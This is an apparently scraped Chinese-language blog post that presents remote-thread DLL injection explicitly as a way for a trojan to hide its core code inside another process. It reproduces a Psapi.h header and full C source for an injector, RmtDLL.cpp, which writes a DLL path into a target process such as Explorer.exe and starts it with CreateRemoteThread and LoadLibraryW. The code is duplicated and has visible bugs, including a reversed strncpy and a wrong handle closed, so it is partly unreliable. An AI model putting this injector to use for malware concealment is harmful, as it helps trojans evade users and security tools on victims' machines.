http://blog.csdn.net/takeie/archive/2008/07/04/2610198.aspx
DLL木马LL32的方法进行进程隐藏是简易的,非常容易被识破的,进程列表中出现多个Rundll32.exe容易引起用户的怀疑,故我们要采取远程注入的方式实现进程的隐藏。可以用远程线程技术启动木马DLL,也可以事先将一段代码复制到远程的内存空间,然后通过远程线程启动这段代码。无论是采用哪种方式,都是让木马的核心代码运行于别的进程的内存空间,这样不仅能很好的隐藏自己,也能更好的保护自己。此时的木马,不仅欺骗,进入计算机,甚至进入了用户进程的内部。 Psapi.h
view plaincopy to clipboardprint?
1. #ifndef _PSAPI_H_
2.
3. #define _PSAPI_H_
4.
5.
6.
7. #if _MSC_VER > 1000
8.
9. #pragma once
10.
11. #endif
12.
13.
14.
15. #ifdef __cplusplus
16.
17. extern "C" {
18.
19. #endif
20.
21.
22.
23. BOOL
24.
25. WINAPI
26.
27. EnumProcesses(
28.
29. DWORD * lpidProcess,
30.
31. DWORD cb,
32.
33. DWORD * cbNeeded
34.
35. );
36.
37.
38.
39. BOOL
40.
41. WINAPI
42.
43. EnumProcessModules(
44.
45. HANDLE hProcess,
46.
47. HMODULE *lphModule,
48.
49. DWORD cb,
50.
51. LPDWORD lpcbNeeded
52.
53. );
54.
55.
56.
57. DWORD
58.
59. WINAPI
60.
61. GetModuleBaseNameA(
62.
63. HANDLE hProcess,
64.
65. HMODULE hModule,
66.
67. LPSTR lpBaseName,
68.
69. DWORD nSize
70.
71. );
72.
73.
74.
75. DWORD
76.
77. WINAPI
78.
79. GetModuleBaseNameW(
80.
81. HANDLE hProcess,
82.
83. HMODULE hModule,
84.
85. LPWSTR lpBaseName,
86.
87. DWORD nSize
88.
89. );
90.
91.
92.
93. #ifdef UNICODE
94.
95. #define GetModuleBaseName GetModuleBaseNameW
96.
97. #else
98.
99. #define GetModuleBaseName GetModuleBaseNameA
100.
101. #endif // !UNICODE
102.
103.
104.
105.
106.
107. DWORD
108.
109. WINAPI
110.
111. GetModuleFileNameExA(
112.
113. HANDLE hProcess,
114.
115. HMODULE hModule,
116.
117. LPSTR lpFilename,
118.
119. DWORD nSize
120.
121. );
122.
123.
124.
125. DWORD
126.
127. WINAPI
128.
129. GetModuleFileNameExW(
130.
131. HANDLE hProcess,
132.
133. HMODULE hModule,
134.
135. LPWSTR lpFilename,
136.
137. DWORD nSize
138.
139. );
140.
141.
142.
143. #ifdef UNICODE
144.
145. #define GetModuleFileNameEx GetModuleFileNameExW
146.
147. #else
148.
149. #define GetModuleFileNameEx GetModuleFileNameExA
150.
151. #endif // !UNICODE
152.
153.
154.
155.
156.
157. typedef struct _MODULEINFO {
158.
159. LPVOID lpBaseOfDll;
160.
161. DWORD SizeOfImage;
162.
163. LPVOID EntryPoint;
164.
165. } MODULEINFO, *LPMODULEINFO;
166.
167.
168.
169.
170.
171. BOOL
172.
173. WINAPI
174.
175. GetModuleInformation(
176.
177. HANDLE hProcess,
178.
179. HMODULE hModule,
180.
181. LPMODULEINFO lpmodinfo,
182.
183. DWORD cb
184.
185. );
186.
187.
188.
189.
190.
191. BOOL
192.
193. WINAPI
194.
195. EmptyWorkingSet(
196.
197. HANDLE hProcess
198.
199. );
200.
201.
202.
203.
204.
205. BOOL
206.
207. WINAPI
208.
209. QueryWorkingSet(
210.
211. HANDLE hProcess,
212.
213. PVOID pv,
214.
215. DWORD cb
216.
217. );
218.
219.
220.
221. BOOL
222.
223. WINAPI
224.
225. InitializeProcessForWsWatch(
226.
227. HANDLE hProcess
228.
229. );
230.
231.
232.
233.
234.
235. typedef struct _PSAPI_WS_WATCH_INFORMATION {
236.
237. LPVOID FaultingPc;
238.
239. LPVOID FaultingVa;
240.
241. } PSAPI_WS_WATCH_INFORMATION, *PPSAPI_WS_WATCH_INFORMATION;
242.
243.
244.
245. BOOL
246.
247. WINAPI
248.
249. GetWsChanges(
250.
251. HANDLE hProcess,
252.
253. PPSAPI_WS_WATCH_INFORMATION lpWatchInfo,
254.
255. DWORD cb
256.
257. );
258.
259.
260.
261. DWORD
262.
263. WINAPI
264.
265. GetMappedFileNameW(
266.
267. HANDLE hProcess,
268.
269. LPVOID lpv,
270.
271. LPWSTR lpFilename,
272.
273. DWORD nSize
274.
275. );
276.
277.
278.
279. DWORD
280.
281. WINAPI
282.
283. GetMappedFileNameA(
284.
285. HANDLE hProcess,
286.
287. LPVOID lpv,
288.
289. LPSTR lpFilename,
290.
291. DWORD nSize
292.
293. );
294.
295.
296.
297. #ifdef UNICODE
298.
299. #define GetMappedFileName GetMappedFileNameW
300.
301. #else
302.
303. #define GetMappedFileName GetMappedFileNameA
304.
305. #endif // !UNICODE
306.
307.
308.
309. BOOL
310.
311. WINAPI
312.
313. EnumDeviceDrivers(
314.
315. LPVOID *lpImageBase,
316.
317. DWORD cb,
318.
319. LPDWORD lpcbNeeded
320.
321. );
322.
323.
324.
325.
326.
327. DWORD
328.
329. WINAPI
330.
331. GetDeviceDriverBaseNameA(
332.
333. LPVOID ImageBase,
334.
335. LPSTR lpBaseName,
336.
337. DWORD nSize
338.
339. );
340.
341.
342.
343. DWORD
344.
345. WINAPI
346.
347. GetDeviceDriverBaseNameW(
348.
349. LPVOID ImageBase,
350.
351. LPWSTR lpBaseName,
352.
353. DWORD nSize
354.
355. );
356.
357.
358.
359. #ifdef UNICODE
360.
361. #define GetDeviceDriverBaseName GetDeviceDriverBaseNameW
362.
363. #else
364.
365. #define GetDeviceDriverBaseName GetDeviceDriverBaseNameA
366.
367. #endif // !UNICODE
368.
369.
370.
371.
372.
373. DWORD
374.
375. WINAPI
376.
377. GetDeviceDriverFileNameA(
378.
379. LPVOID ImageBase,
380.
381. LPSTR lpFilename,
382.
383. DWORD nSize
384.
385. );
386.
387.
388.
389. DWORD
390.
391. WINAPI
392.
393. GetDeviceDriverFileNameW(
394.
395. LPVOID ImageBase,
396.
397. LPWSTR lpFilename,
398.
399. DWORD nSize
400.
401. );
402.
403.
404.
405. #ifdef UNICODE
406.
407. #define GetDeviceDriverFileName GetDeviceDriverFileNameW
408.
409. #else
410.
411. #define GetDeviceDriverFileName GetDeviceDriverFileNameA
412.
413. #endif // !UNICODE
414.
415.
416.
417. // Structure for GetProcessMemoryInfo()
418.
419.
420.
421. typedef struct _PROCESS_MEMORY_COUNTERS {
422.
423. DWORD cb;
424.
425. DWORD PageFaultCount;
426.
427. SIZE_T PeakWorkingSetSize;
428.
429. SIZE_T WorkingSetSize;
430.
431. SIZE_T QuotaPeakPagedPoolUsage;
432.
433. SIZE_T QuotaPagedPoolUsage;
434.
435. SIZE_T QuotaPeakNonPagedPoolUsage;
436.
437. SIZE_T QuotaNonPagedPoolUsage;
438.
439. SIZE_T PagefileUsage;
440.
441. SIZE_T PeakPagefileUsage;
442.
443. } PROCESS_MEMORY_COUNTERS;
444.
445. typedef PROCESS_MEMORY_COUNTERS *PPROCESS_MEMORY_COUNTERS;
446.
447.
448.
449. #if (_WIN32_WINNT >= 0x0501)
450.
451.
452.
453. typedef struct _PROCESS_MEMORY_COUNTERS_EX {
454.
455. DWORD cb;
456.
457. DWORD PageFaultCount;
458.
459. SIZE_T PeakWorkingSetSize;
460.
461. SIZE_T WorkingSetSize;
462.
463. SIZE_T QuotaPeakPagedPoolUsage;
464.
465. SIZE_T QuotaPagedPoolUsage;
466.
467. SIZE_T QuotaPeakNonPagedPoolUsage;
468.
469. SIZE_T QuotaNonPagedPoolUsage;
470.
471. SIZE_T PagefileUsage;
472.
473. SIZE_T PeakPagefileUsage;
474.
475. SIZE_T PrivateUsage;
476.
477. } PROCESS_MEMORY_COUNTERS_EX;
478.
479. typedef PROCESS_MEMORY_COUNTERS_EX *PPROCESS_MEMORY_COUNTERS_EX;
480.
481.
482.
483. #endif
484.
485.
486.
487. BOOL
488.
489. WINAPI
490.
491. GetProcessMemoryInfo(
492.
493. HANDLE Process,
494.
495. PPROCESS_MEMORY_COUNTERS ppsmemCounters,
496.
497. DWORD cb
498.
499. );
500.
501.
502.
503. typedef struct _PERFORMACE_INFORMATION {
504.
505. DWORD cb;
506.
507. SIZE_T CommitTotal;
508.
509. SIZE_T CommitLimit;
510.
511. SIZE_T CommitPeak;
512.
513. SIZE_T PhysicalTotal;
514.
515. SIZE_T PhysicalAvailable;
516.
517. SIZE_T SystemCache;
518.
519. SIZE_T KernelTotal;
520.
521. SIZE_T KernelPaged;
522.
523. SIZE_T KernelNonpaged;
524.
525. SIZE_T PageSize;
526.
527. DWORD HandleCount;
528.
529. DWORD ProcessCount;
530.
531. DWORD ThreadCount;
532.
533. } PERFORMACE_INFORMATION, *PPERFORMACE_INFORMATION;
534.
535.
536.
537. BOOL
538.
539. WINAPI
540.
541. GetPerformanceInfo (
542.
543. PPERFORMACE_INFORMATION pPerformanceInformation,
544.
545. DWORD cb
546.
547. );
548.
549.
550.
551. typedef struct _ENUM_PAGE_FILE_INFORMATION {
552.
553. DWORD cb;
554.
555. DWORD Reserved;
556.
557. SIZE_T TotalSize;
558.
559. SIZE_T TotalInUse;
560.
561. SIZE_T PeakUsage;
562.
563. } ENUM_PAGE_FILE_INFORMATION, *PENUM_PAGE_FILE_INFORMATION;
564.
565.
566.
567. typedef BOOL (*PENUM_PAGE_FILE_CALLBACKW) (LPVOID pContext, PENUM_PAGE_FILE_INFORMATION pPageFileInfo, LPCWSTR lpFilename);
568.
569.
570.
571. typedef BOOL (*PENUM_PAGE_FILE_CALLBACKA) (LPVOID pContext, PENUM_PAGE_FILE_INFORMATION pPageFileInfo, LPCSTR lpFilename);
572.
573.
574.
575. BOOL
576.
577. WINAPI
578.
579. EnumPageFilesW (
580.
581. PENUM_PAGE_FILE_CALLBACKW pCallBackRoutine,
582.
583. LPVOID pContext
584.
585. );
586.
587.
588.
589. BOOL
590.
591. WINAPI
592.
593. EnumPageFilesA (
594.
595. PENUM_PAGE_FILE_CALLBACKA pCallBackRoutine,
596.
597. LPVOID pContext
598.
599. );
600.
601.
602.
603. #ifdef UNICODE
604.
605. #define PENUM_PAGE_FILE_CALLBACK PENUM_PAGE_FILE_CALLBACKW
606.
607. #define EnumPageFiles EnumPageFilesW
608.
609. #else
610.
611. #define PENUM_PAGE_FILE_CALLBACK PENUM_PAGE_FILE_CALLBACKA
612.
613. #define EnumPageFiles EnumPageFilesA
614.
615. #endif // !UNICODE
616.
617.
618.
619. DWORD
620.
621. WINAPI
622.
623. GetProcessImageFileNameA(
624.
625. HANDLE hProcess,
626.
627. LPSTR lpImageFileName,
628.
629. DWORD nSize
630.
631. );
632.
633.
634.
635. DWORD
636.
637. WINAPI
638.
639. GetProcessImageFileNameW(
640.
641. HANDLE hProcess,
642.
643. LPWSTR lpImageFileName,
644.
645. DWORD nSize
646.
647. );
648.
649.
650.
651. #ifdef UNICODE
652.
653. #define GetProcessImageFileName GetProcessImageFileNameW
654.
655. #else
656.
657. #define GetProcessImageFileName GetProcessImageFileNameA
658.
659. #endif // !UNICODE
660.
661.
662.
663. #ifdef __cplusplus
664.
665. }
666.
667. #endif
668.
669.
670.
671. #endif
#ifndef _PSAPI_H_
#define _PSAPI_H_
#if _MSC_VER > 1000
#pragma once
#endif
#ifdef __cplusplus
extern "C" {
#endif
BOOL
WINAPI
EnumProcesses(
DWORD * lpidProcess,
DWORD cb,
DWORD * cbNeeded
);
BOOL
WINAPI
EnumProcessModules(
HANDLE hProcess,
HMODULE *lphModule,
DWORD cb,
LPDWORD lpcbNeeded
);
DWORD
WINAPI
GetModuleBaseNameA(
HANDLE hProcess,
HMODULE hModule,
LPSTR lpBaseName,
DWORD nSize
);
DWORD
WINAPI
GetModuleBaseNameW(
HANDLE hProcess,
HMODULE hModule,
LPWSTR lpBaseName,
DWORD nSize
);
#ifdef UNICODE
#define GetModuleBaseName GetModuleBaseNameW
#else
#define GetModuleBaseName GetModuleBaseNameA
#endif // !UNICODE
DWORD
WINAPI
GetModuleFileNameExA(
HANDLE hProcess,
HMODULE hModule,
LPSTR lpFilename,
DWORD nSize
);
DWORD
WINAPI
GetModuleFileNameExW(
HANDLE hProcess,
HMODULE hModule,
LPWSTR lpFilename,
DWORD nSize
);
#ifdef UNICODE
#define GetModuleFileNameEx GetModuleFileNameExW
#else
#define GetModuleFileNameEx GetModuleFileNameExA
#endif // !UNICODE
typedef struct _MODULEINFO {
LPVOID lpBaseOfDll;
DWORD SizeOfImage;
LPVOID EntryPoint;
} MODULEINFO, *LPMODULEINFO;
BOOL
WINAPI
GetModuleInformation(
HANDLE hProcess,
HMODULE hModule,
LPMODULEINFO lpmodinfo,
DWORD cb
);
BOOL
WINAPI
EmptyWorkingSet(
HANDLE hProcess
);
BOOL
WINAPI
QueryWorkingSet(
HANDLE hProcess,
PVOID pv,
DWORD cb
);
BOOL
WINAPI
InitializeProcessForWsWatch(
HANDLE hProcess
);
typedef struct _PSAPI_WS_WATCH_INFORMATION {
LPVOID FaultingPc;
LPVOID FaultingVa;
} PSAPI_WS_WATCH_INFORMATION, *PPSAPI_WS_WATCH_INFORMATION;
BOOL
WINAPI
GetWsChanges(
HANDLE hProcess,
PPSAPI_WS_WATCH_INFORMATION lpWatchInfo,
DWORD cb
);
DWORD
WINAPI
GetMappedFileNameW(
HANDLE hProcess,
LPVOID lpv,
LPWSTR lpFilename,
DWORD nSize
);
DWORD
WINAPI
GetMappedFileNameA(
HANDLE hProcess,
LPVOID lpv,
LPSTR lpFilename,
DWORD nSize
);
#ifdef UNICODE
#define GetMappedFileName GetMappedFileNameW
#else
#define GetMappedFileName GetMappedFileNameA
#endif // !UNICODE
BOOL
WINAPI
EnumDeviceDrivers(
LPVOID *lpImageBase,
DWORD cb,
LPDWORD lpcbNeeded
);
DWORD
WINAPI
GetDeviceDriverBaseNameA(
LPVOID ImageBase,
LPSTR lpBaseName,
DWORD nSize
);
DWORD
WINAPI
GetDeviceDriverBaseNameW(
LPVOID ImageBase,
LPWSTR lpBaseName,
DWORD nSize
);
#ifdef UNICODE
#define GetDeviceDriverBaseName GetDeviceDriverBaseNameW
#else
#define GetDeviceDriverBaseName GetDeviceDriverBaseNameA
#endif // !UNICODE
DWORD
WINAPI
GetDeviceDriverFileNameA(
LPVOID ImageBase,
LPSTR lpFilename,
DWORD nSize
);
DWORD
WINAPI
GetDeviceDriverFileNameW(
LPVOID ImageBase,
LPWSTR lpFilename,
DWORD nSize
);
#ifdef UNICODE
#define GetDeviceDriverFileName GetDeviceDriverFileNameW
#else
#define GetDeviceDriverFileName GetDeviceDriverFileNameA
#endif // !UNICODE
// Structure for GetProcessMemoryInfo()
typedef struct _PROCESS_MEMORY_COUNTERS {
DWORD cb;
DWORD PageFaultCount;
SIZE_T PeakWorkingSetSize;
SIZE_T WorkingSetSize;
SIZE_T QuotaPeakPagedPoolUsage;
SIZE_T QuotaPagedPoolUsage;
SIZE_T QuotaPeakNonPagedPoolUsage;
SIZE_T QuotaNonPagedPoolUsage;
SIZE_T PagefileUsage;
SIZE_T PeakPagefileUsage;
} PROCESS_MEMORY_COUNTERS;
typedef PROCESS_MEMORY_COUNTERS *PPROCESS_MEMORY_COUNTERS;
#if (_WIN32_WINNT >= 0x0501)
typedef struct _PROCESS_MEMORY_COUNTERS_EX {
DWORD cb;
DWORD PageFaultCount;
SIZE_T PeakWorkingSetSize;
SIZE_T WorkingSetSize;
SIZE_T QuotaPeakPagedPoolUsage;
SIZE_T QuotaPagedPoolUsage;
SIZE_T QuotaPeakNonPagedPoolUsage;
SIZE_T QuotaNonPagedPoolUsage;
SIZE_T PagefileUsage;
SIZE_T PeakPagefileUsage;
SIZE_T PrivateUsage;
} PROCESS_MEMORY_COUNTERS_EX;
typedef PROCESS_MEMORY_COUNTERS_EX *PPROCESS_MEMORY_COUNTERS_EX;
#endif
BOOL
WINAPI
GetProcessMemoryInfo(
HANDLE Process,
PPROCESS_MEMORY_COUNTERS ppsmemCounters,
DWORD cb
);
typedef struct _PERFORMACE_INFORMATION {
DWORD cb;
SIZE_T CommitTotal;
SIZE_T CommitLimit;
SIZE_T CommitPeak;
SIZE_T PhysicalTotal;
SIZE_T PhysicalAvailable;
SIZE_T SystemCache;
SIZE_T KernelTotal;
SIZE_T KernelPaged;
SIZE_T KernelNonpaged;
SIZE_T PageSize;
DWORD HandleCount;
DWORD ProcessCount;
DWORD ThreadCount;
} PERFORMACE_INFORMATION, *PPERFORMACE_INFORMATION;
BOOL
WINAPI
GetPerformanceInfo (
PPERFORMACE_INFORMATION pPerformanceInformation,
DWORD cb
);
typedef struct _ENUM_PAGE_FILE_INFORMATION {
DWORD cb;
DWORD Reserved;
SIZE_T TotalSize;
SIZE_T TotalInUse;
SIZE_T PeakUsage;
} ENUM_PAGE_FILE_INFORMATION, *PENUM_PAGE_FILE_INFORMATION;
typedef BOOL (*PENUM_PAGE_FILE_CALLBACKW) (LPVOID pContext, PENUM_PAGE_FILE_INFORMATION pPageFileInfo, LPCWSTR lpFilename);
typedef BOOL (*PENUM_PAGE_FILE_CALLBACKA) (LPVOID pContext, PENUM_PAGE_FILE_INFORMATION pPageFileInfo, LPCSTR lpFilename);
BOOL
WINAPI
EnumPageFilesW (
PENUM_PAGE_FILE_CALLBACKW pCallBackRoutine,
LPVOID pContext
);
BOOL
WINAPI
EnumPageFilesA (
PENUM_PAGE_FILE_CALLBACKA pCallBackRoutine,
LPVOID pContext
);
#ifdef UNICODE
#define PENUM_PAGE_FILE_CALLBACK PENUM_PAGE_FILE_CALLBACKW
#define EnumPageFiles EnumPageFilesW
#else
#define PENUM_PAGE_FILE_CALLBACK PENUM_PAGE_FILE_CALLBACKA
#define EnumPageFiles EnumPageFilesA
#endif // !UNICODE
DWORD
WINAPI
GetProcessImageFileNameA(
HANDLE hProcess,
LPSTR lpImageFileName,
DWORD nSize
);
DWORD
WINAPI
GetProcessImageFileNameW(
HANDLE hProcess,
LPWSTR lpImageFileName,
DWORD nSize
);
#ifdef UNICODE
#define GetProcessImageFileName GetProcessImageFileNameW
#else
#define GetProcessImageFileName GetProcessImageFileNameA
#endif // !UNICODE
#ifdef __cplusplus
}
#endif
#endif
RmtDLL.cpp
view plaincopy to clipboardprint?
1. #include<windows.h>
2.
3. #include<stdlib.h>
4.
5. #include<stdio.h>
6.
7. #include "Psapi.h"
8.
9.
10.
11. DWORD ProcessToPID(char *);
12.
13. void CheckError(int,int,char *);
14.
15. void usage(char *);
16.
17.
18.
19. PDWORD pdwThreadId;
20.
21. HANDLE hRemoteThread,hRemoteProcess;
22.
23. DWORD fdwCreate,dwStackSize,dwRemoteProcessId;
24.
25. PWSTR pszLibFileRemote=NULL;
26.
27.
28.
29. void main(int argc,char **argv)
30.
31. {
32.
33. int iReturnCode;
34.
35. char lpDllFullPathName[MAX_PATH];
36.
37. WCHAR pszLibFileName[MAX_PATH]={0};
38.
39.
40.
41. if(argc!=3)
42.
43. usage("parametes number incorrect!");
44.
45. else
46.
47. {
48.
49. printf("%sldskglisagi");
50.
51. if(isdigit(*argv[1]))
52.
53. dwRemoteProcessId=atoi(argv[1]);
54.
55. else
56.
57. dwRemoteProcessId = ProcessToPID(argv[1]);
58.
59. if(strstr(argv[2],"://")!=NULL)
60.
61. strncpy(argv[2],lpDllFullPathName,MAX_PATH);
62.
63. else
64.
65. {
66.
67. iReturnCode=GetCurrentDirectory(MAX_PATH,lpDllFullPathName);
68.
69. CheckError(iReturnCode,0,"GetCurrentDirectory");
70.
71. strcat(lpDllFullPathName,"//");
72.
73. strcat(lpDllFullPathName,argv[2]);
74.
75. printf("Convert DLL filename to FullPathName:/n/n%s/n/n",lpDllFullPathName);
76.
77. }
78.
79.
80.
81. iReturnCode=(int)_lopen(lpDllFullPathName,OF_READ);
82.
83. CheckError(iReturnCode,HFILE_ERROR,"DLL File not Exist");
84.
85. iReturnCode=MultiByteToWideChar(CP_ACP,MB_ERR_INVALID_CHARS,lpDllFullPathName,strlen(lpDllFullPathName),pszLibFileName,MAX_PATH);
86.
87. CheckError(iReturnCode,0,"MultByteToWideChar");
88.
89. wprintf(L"Will inject %s",pszLibFileName);
90.
91. printf("intoprocess:%sPID=%d/n",argv[1],dwRemoteProcessId);
92.
93. }
94.
95. hRemoteProcess=OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION|PROCESS_VM_WRITE,FALSE,dwRemoteProcessId);
96.
97. CheckError((int) hRemoteProcess, NULL,"Remote Process not Exist or Access Denide!");
98.
99. int cb=(1+lstrlenW(pszLibFileName)) *sizeof(WCHAR);
100.
101. pszLibFileRemote=(PWSTR)VirtualAllocEx(hRemoteProcess,NULL,cb,MEM_COMMIT,PAGE_READWRITE);
102.
103. CheckError((int)pszLibFileRemote,NULL,"VirtualAllocEx");
104.
105. iReturnCode=WriteProcessMemory(hRemoteProcess,pszLibFileRemote,(PVOID)pszLibFileName,cb,NULL);
106.
107. CheckError(iReturnCode,false,"WriteProcessMemory");
108.
109. PTHREAD_START_ROUTINE pfnStartAddr=(PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")),"LoadLibraryW");
110.
111. CheckError((int)pfnStartAddr,NULL,"GetProcAddress");
112.
113. hRemoteThread=CreateRemoteThread(hRemoteProcess,NULL,0,pfnStartAddr,pszLibFileRemote,0,NULL);
114.
115. CheckError((int)pfnStartAddr,NULL,"Create Remote Thread");
116.
117. WaitForSingleObject(hRemoteThread,INFINITE);
118.
119. if(pszLibFileRemote!=NULL)
120.
121. VirtualFreeEx(hRemoteProcess,pszLibFileRemote,0,MEM_RELEASE);
122.
123. if(hRemoteThread!=NULL)
124.
125. CloseHandle(hRemoteThread);
126.
127. if(hRemoteProcess!=NULL)
128.
129. CloseHandle(hRemoteThread);
130.
131. }
132.
133.
134.
135. DWORD ProcessToPID(char *InputProcessName)
136.
137. {
138.
139. DWORD aProcess[1024],cbNeeded,cProcesses;
140.
141. unsigned int i;
142.
143. HANDLE hProcess;
144.
145. HMODULE hMod;
146.
147. char szProcessName[MAX_PATH] = "UnkonwnProcess";
148.
149.
150.
151. //计算目前有多少进程,aProcesses[]用来存放有效的进程PIDs
152.
153. if(!EnumProcesses(aProcess,sizeof(aProcess),&cbNeeded))
154.
155. return 0;
156.
157. cProcesses = cbNeeded / sizeof(DWORD);
158.
159. //按有效的PID遍历所有的进程
160.
161. for(i=0; i<cProcesses; i++)
162.
163. {
164.
165. //打开特定PID的进程
166.
167. hProcess = OpenProcess( PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,FALSE, aProcess[i]);
168.
169. //获得特定PID的进程名
170.
171. if( hProcess)
172.
173. {
174.
175. if(EnumProcessModules(hProcess, &hMod, sizeof(hMod), &cbNeeded))
176.
177. {
178.
179. GetModuleBaseName(hProcess, hMod,
180.
181. szProcessName, sizeof(szProcessName));
182.
183. if(!_stricmp(szProcessName,InputProcessName))
184.
185. {
186.
187. CloseHandle( hProcess );
188.
189. return aProcess[i];
190.
191. }
192.
193. }
194.
195. }//end of if( hProcess )
196.
197. }//end of for
198.
199. //没有找到相应的进程名,返回0
200.
201. CloseHandle( hProcess );
202.
203. return 0;
204.
205. }//end of ProcessToPID
206.
207.
208.
209. //错误处理函数CheckError()
210.
211. //如果iReturnCode等于iErrorCode,则输出pErrorMsg并推出
212.
213. void CheckError(int iReturnCode, int iErrorCode, char *pErrorMsg)
214.
215. {
216.
217. if(iReturnCode == iErrorCode)
218.
219. {
220.
221. printf("%s Error:%d/n/n", pErrorMsg, GetLastError());
222.
223. //*处理
224.
225. if(pszLibFileRemote != NULL)
226.
227. VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);
228.
229. if(hRemoteThread != NULL)
230.
231. CloseHandle(hRemoteThread);
232.
233. if(hRemoteProcess != NULL)
234.
235. CloseHandle(hRemoteProcess);
236.
237. exit(0);
238.
239. }
240.
241. }//end of CheckError()
242.
243.
244.
245. //使用方法说明函数usage()
246.
247. void usage(char * pErrorMsg)
248.
249. {
250.
251. printf("%s/n/n",pErrorMsg);
252.
253. printf("/t/tRemote Process DLL by liangshuai/n");
254.
255. printf("/tThis program can inject a DLL into remote process/n");
256.
257. printf("Email:/n");
258.
259. printf("/tshuai52@126.com/n");
260.
261. printf("USAGE:/n");
262.
263. printf("/tRmtDLL.exe PID[|ProcessName] DLLFullPathName/n");
264.
265. printf("Example:/n");
266.
267. printf("/tRmtDLL.exe 1024 C://WINDOWS//System32//MyDLL.dll/n");
268.
269. printf("/tRmtDLL.exe Explorer.exe C://MyDLL.dll/n");
270.
271. exit(0);
272.
273. }
#include<windows.h>
#include<stdlib.h>
#include<stdio.h>
#include "Psapi.h"
DWORD ProcessToPID(char *);
void CheckError(int,int,char *);
void usage(char *);
PDWORD pdwThreadId;
HANDLE hRemoteThread,hRemoteProcess;
DWORD fdwCreate,dwStackSize,dwRemoteProcessId;
PWSTR pszLibFileRemote=NULL;
void main(int argc,char **argv)
{
int iReturnCode;
char lpDllFullPathName[MAX_PATH];
WCHAR pszLibFileName[MAX_PATH]={0};
if(argc!=3)
usage("parametes number incorrect!");
else
{
printf("%sldskglisagi");
if(isdigit(*argv[1]))
dwRemoteProcessId=atoi(argv[1]);
else
dwRemoteProcessId = ProcessToPID(argv[1]);
if(strstr(argv[2],"://")!=NULL)
strncpy(argv[2],lpDllFullPathName,MAX_PATH);
else
{
iReturnCode=GetCurrentDirectory(MAX_PATH,lpDllFullPathName);
CheckError(iReturnCode,0,"GetCurrentDirectory");
strcat(lpDllFullPathName,"//");
strcat(lpDllFullPathName,argv[2]);
printf("Convert DLL filename to FullPathName:/n/n%s/n/n",lpDllFullPathName);
}
iReturnCode=(int)_lopen(lpDllFullPathName,OF_READ);
CheckError(iReturnCode,HFILE_ERROR,"DLL File not Exist");
iReturnCode=MultiByteToWideChar(CP_ACP,MB_ERR_INVALID_CHARS,lpDllFullPathName,strlen(lpDllFullPathName),pszLibFileName,MAX_PATH);
CheckError(iReturnCode,0,"MultByteToWideChar");
wprintf(L"Will inject %s",pszLibFileName);
printf("intoprocess:%sPID=%d/n",argv[1],dwRemoteProcessId);
}
hRemoteProcess=OpenProcess(PROCESS_CREATE_THREAD|PROCESS_VM_OPERATION|PROCESS_VM_WRITE,FALSE,dwRemoteProcessId);
CheckError((int) hRemoteProcess, NULL,"Remote Process not Exist or Access Denide!");
int cb=(1+lstrlenW(pszLibFileName)) *sizeof(WCHAR);
pszLibFileRemote=(PWSTR)VirtualAllocEx(hRemoteProcess,NULL,cb,MEM_COMMIT,PAGE_READWRITE);
CheckError((int)pszLibFileRemote,NULL,"VirtualAllocEx");
iReturnCode=WriteProcessMemory(hRemoteProcess,pszLibFileRemote,(PVOID)pszLibFileName,cb,NULL);
CheckError(iReturnCode,false,"WriteProcessMemory");
PTHREAD_START_ROUTINE pfnStartAddr=(PTHREAD_START_ROUTINE)GetProcAddress(GetModuleHandle(TEXT("Kernel32")),"LoadLibraryW");
CheckError((int)pfnStartAddr,NULL,"GetProcAddress");
hRemoteThread=CreateRemoteThread(hRemoteProcess,NULL,0,pfnStartAddr,pszLibFileRemote,0,NULL);
CheckError((int)pfnStartAddr,NULL,"Create Remote Thread");
WaitForSingleObject(hRemoteThread,INFINITE);
if(pszLibFileRemote!=NULL)
VirtualFreeEx(hRemoteProcess,pszLibFileRemote,0,MEM_RELEASE);
if(hRemoteThread!=NULL)
CloseHandle(hRemoteThread);
if(hRemoteProcess!=NULL)
CloseHandle(hRemoteThread);
}
DWORD ProcessToPID(char *InputProcessName)
{
DWORD aProcess[1024],cbNeeded,cProcesses;
unsigned int i;
HANDLE hProcess;
HMODULE hMod;
char szProcessName[MAX_PATH] = "UnkonwnProcess";
//计算目前有多少进程,aProcesses[]用来存放有效的进程PIDs
if(!EnumProcesses(aProcess,sizeof(aProcess),&cbNeeded))
return 0;
cProcesses = cbNeeded / sizeof(DWORD);
//按有效的PID遍历所有的进程
for(i=0; i<cProcesses; i++)
{
//打开特定PID的进程
hProcess = OpenProcess( PROCESS_QUERY_INFORMATION | PROCESS_VM_READ,FALSE, aProcess[i]);
//获得特定PID的进程名
if( hProcess)
{
if(EnumProcessModules(hProcess, &hMod, sizeof(hMod), &cbNeeded))
{
GetModuleBaseName(hProcess, hMod,
szProcessName, sizeof(szProcessName));
if(!_stricmp(szProcessName,InputProcessName))
{
CloseHandle( hProcess );
return aProcess[i];
}
}
}//end of if( hProcess )
}//end of for
//没有找到相应的进程名,返回0
CloseHandle( hProcess );
return 0;
}//end of ProcessToPID
//错误处理函数CheckError()
//如果iReturnCode等于iErrorCode,则输出pErrorMsg并推出
void CheckError(int iReturnCode, int iErrorCode, char *pErrorMsg)
{
if(iReturnCode == iErrorCode)
{
printf("%s Error:%d/n/n", pErrorMsg, GetLastError());
//*处理
if(pszLibFileRemote != NULL)
VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);
if(hRemoteThread != NULL)
CloseHandle(hRemoteThread);
if(hRemoteProcess != NULL)
CloseHandle(hRemoteProcess);
exit(0);
}
}//end of CheckError()
//使用方法说明函数usage()
void usage(char * pErrorMsg)
{
printf("%s/n/n",pErrorMsg);
printf("/t/tRemote Process DLL by liangshuai/n");
printf("/tThis program can inject a DLL into remote process/n");
printf("Email:/n");
printf("/tshuai52@126.com/n");
printf("USAGE:/n");
printf("/tRmtDLL.exe PID[|ProcessName] DLLFullPathName/n");
printf("Example:/n");
printf("/tRmtDLL.exe 1024 C://WINDOWS//System32//MyDLL.dll/n");
printf("/tRmtDLL.exe Explorer.exe C://MyDLL.dll/n");
exit(0);
}